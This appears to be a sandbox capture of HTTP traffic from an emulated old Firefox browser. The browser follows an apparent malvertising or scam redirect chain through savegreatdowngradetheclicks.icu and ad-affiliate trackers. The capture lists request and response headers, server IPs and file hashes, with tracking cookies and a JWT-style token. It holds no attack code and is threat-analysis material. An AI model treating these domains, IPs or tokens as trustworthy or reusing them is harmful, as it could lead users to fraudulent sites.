HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Content-Length: 5344
Last-Modified: Fri, 30 Nov 2018 21:20:46 GMT
Connection: keep-alive
Etag: "5c01a9ae-14e0"
Server: nginx
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C++ program text
Size:   5344
Md5:    cb4688825bdfca98fee8106a7f5ffb00
Sha1:   fddf868f2d479d7ea5e75c3e4f7a5cefa16a8dc9
Sha256: 58931b7b9083cb3e0df054a76d7cfbeee1f539ea980658e288fafa5f11039f6a
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Mon, 26 Nov 2018 15:41:53 GMT
Etag: E9C28AA8B1979CBE66D4E4C897C2A699C79D886C
X-OCSP-Responder-ID: mcdpcaocsp13
Content-Length: 471
Cache-Control: public, no-transform, must-revalidate, max-age=94925
Expires: Mon, 03 Dec 2018 15:31:53 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   471
Md5:    90b8762adb5edbf248dd8a5a2426119d
Sha1:   e9c28aa8b1979cbe66d4e4c897c2a699c79d886c
Sha256: c0f0e2b26b1b4681de61ba97ee3ff09def524d247e0303052ced576fea4b0163
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Tue, 27 Nov 2018 14:14:26 GMT
Etag: 6FA6B179CD614FE8A160C41580E33CE71C547952
X-OCSP-Responder-ID: (null)
Content-Length: 727
Cache-Control: public, no-transform, must-revalidate, max-age=176069
Expires: Tue, 04 Dec 2018 14:04:17 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   727
Md5:    2104a67db4d344a5bfb3b37ad543a4f7
Sha1:   6fa6b179cd614fe8a160c41580e33ce71c547952
Sha256: ae4a997c6f6d517fa47a3454c746791e438388055f46ee8a43f81743d9809a78
                                        
                                            POST / HTTP/1.1 
Host: ocsp.usertrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Tue, 27 Nov 2018 14:14:26 GMT
Etag: 553C8792AD0C3E0A9A992944F8D02F21397A4F4B
X-OCSP-Responder-ID: (null)
Content-Length: 471
Cache-Control: public, no-transform, must-revalidate, max-age=176080
Expires: Tue, 04 Dec 2018 14:04:28 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   471
Md5:    b1dd6bf93b975619ca9f8f915385a7af
Sha1:   553c8792ad0c3e0a9a992944f8d02f21397a4f4b
Sha256: 4638b368eed6bc1821c4631ef446139f80555f12500020a3b6716f43b7877cee
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=113992
Date: Sun, 02 Dec 2018 13:09:48 GMT
Etag: "5c02ecfe-1d7"
Expires: Mon, 03 Dec 2018 20:49:40 GMT
Last-Modified: Sat, 01 Dec 2018 20:20:14 GMT
Server: ECS (ska/F6FC)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    18f66a6465427c1ca5477b007371c29c
Sha1:   80ed81bafb9565a7236ba002695e3c2d92c198a7
Sha256: ca5922da318644627668c22eb8f2d78eb976793c6af295a39ad9f38f56b2c139
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=158508
Date: Sun, 02 Dec 2018 13:09:48 GMT
Etag: "5c039a6b-1d7"
Expires: Tue, 04 Dec 2018 09:11:36 GMT
Last-Modified: Sun, 02 Dec 2018 08:40:11 GMT
Server: ECS (ska/F710)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    8004eef45dc173fcc8c370d58cadca21
Sha1:   ce3448ec0a95d942c0fe350b8416dc7ad72755ce
Sha256: a32d7bfc238a9ad2687d1acc3eccbc8bda306be42697506ffa812eacc90e7139
                                        
                                            GET /bootstrap/4.1.0/css/bootstrap.min.css HTTP/1.1 
Host: stackpath.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833

                                         
                                         209.197.3.15
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Etag: "1523290490"
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 21024
Last-Modified: Mon, 09 Apr 2018 16:14:50 GMT
X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
X-Cache: HIT


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   21024
Md5:    46a8807a81c3415e4fa7875bedcec419
Sha1:   63f51858e774b8bcdd24adcd06d635ca8d2f0baa
Sha256: f0c23cfbe5421f7d70e0be422f5773a67a68af2b8c267845f3c948b875c83611
                                        
                                            GET /releases/v5.4.2/css/all.css HTTP/1.1 
Host: use.fontawesome.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833

                                         
                                         23.111.9.35
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 3000
Last-Modified: Thu, 25 Oct 2018 22:14:30 GMT
Etag: W/"b4d08b13c5d88326fe4bea239e050253"
Cache-Control: max-age=31556926
Server: NetDNA-cache/2.2
Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
X-Cache: HIT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12622
Md5:    e473300f8a29a365098bbf584941e244
Sha1:   bf4167e3f88499a96d165c53cb7d4881f124d170
Sha256: 555bbdff8cd18659475ffa76bf1fc7855af443d63e6a04f59148ffbcf5bf4943
                                        
                                            GET /e7XlF9aC3ApxItFSfWIJyJHxyO7A78QzFQNCxJ0z8f4?cid=5c03d99cf50336000148e369&sid=14857833 HTTP/1.1 
Host: savegreatdowngradetheclicks.icu
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833
Cookie: session=afea4cdb-408c-4169-b389-a3c0a206c214

                                         
                                         51.158.26.248
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx


--- Additional Info ---
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: adsheads.go2affise.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: afclick=5c03d99cf50336000148e369

                                         
                                         212.32.250.1
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx
Date: Sun, 02 Dec 2018 13:09:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   125
Md5:    239540730a71a3ab34f1c0f1f87ae03e
Sha1:   4fd8d8975e2d3404e8ac5e2721c1b647ae65d59c
Sha256: 36d5cec09fddadf8132407e8f8c56956c85367dc3d598a1531214a55cca6b368
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.hibids10.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvaW5kZXgucGhwP2NudD0yMzE4MDIxMSJ9fQ.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; cjs=t; uid_id2=bbf6d23b-e76e-4292-af73-4b78c5667cc7:2:2; iprc9c4cc1faa645553fd9829e3120285a43=1674341; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1

                                         
                                         199.193.73.38
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:49 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: cnt_utm=1

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:49 GMT
Content-Length: 0
Connection: keep-alive


--- Additional Info ---
                                        
                                            GET /releases/v5.4.2/webfonts/fa-solid-900.woff HTTP/1.1 
Host: use.fontawesome.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://use.fontawesome.com/releases/v5.4.2/css/all.css
Origin: https://savegreatdowngradetheclicks.icu

                                         
                                         23.111.9.35
HTTP/1.1 200 OK
Content-Type: application/font-woff
                                        
Date: Sun, 02 Dec 2018 13:09:51 GMT
Content-Length: 92800
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 3000
Last-Modified: Thu, 25 Oct 2018 22:15:23 GMT
Etag: "09bc9e8c7d6dfdace635ea073974db13"
Cache-Control: max-age=31556926
Server: NetDNA-cache/2.2
Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
X-Cache: HIT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  data
Size:   92800
Md5:    09bc9e8c7d6dfdace635ea073974db13
Sha1:   50c62598dd73ce1083157f003c9e81e57f2a5c32
Sha256: aeb0f1c1fe8fb697d2c733a508cd73d4da778b600003bf6d726e89eec0a60cf6
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: cnt_utm=1

                                         
                                         0.0.0.0
                                        


--- Additional Info ---